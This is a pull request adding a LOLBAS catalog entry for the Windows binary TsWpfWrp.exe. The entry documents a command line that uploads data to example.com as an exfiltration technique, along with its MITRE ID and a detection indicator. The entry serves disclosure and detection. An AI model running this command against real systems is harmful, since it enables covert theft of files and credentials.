### PR TITLE
Add TsWpfWrp.yml

### DIFF
--- a/yml/OSBinaries/TsWpfWrp.yml
+++ b/yml/OSBinaries/TsWpfWrp.yml
@@ -1,0 +1,24 @@
+---
+Name: TsWpfWrp.exe
+Description: Windows Presentation Foundation Terminal Server Print Wrapper
+Author: Avihay Eldad
+Created: 2024-04-25
+Commands:
+  - Command: TsWpfWrp.exe http://example.com/ExfilData blabla
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Exfilitrate data to remote server
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Windows\System32\TsWpfWrp.exe
+  - Path: C:\Windows\SysWOW64\TsWpfWrp.exe
+Detection:
+  - IOC: TsWpfWrp making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'
+  - Person: Sagi Dinar
+    Handle: '@DinarSagi'
+    


### PR DESCRIPTION
Windows Presentation Foundation Terminal Server Print Wrapper binary (TsWpfWrp.exe) can be used to upload files or exfiltrate data to remote server using HTTP POST request.

![upload](https://github.com/LOLBAS-Project/LOLBAS/assets/46644022/130eb6e3-29c3-4c09-97f6-3bd6fb3f2893)
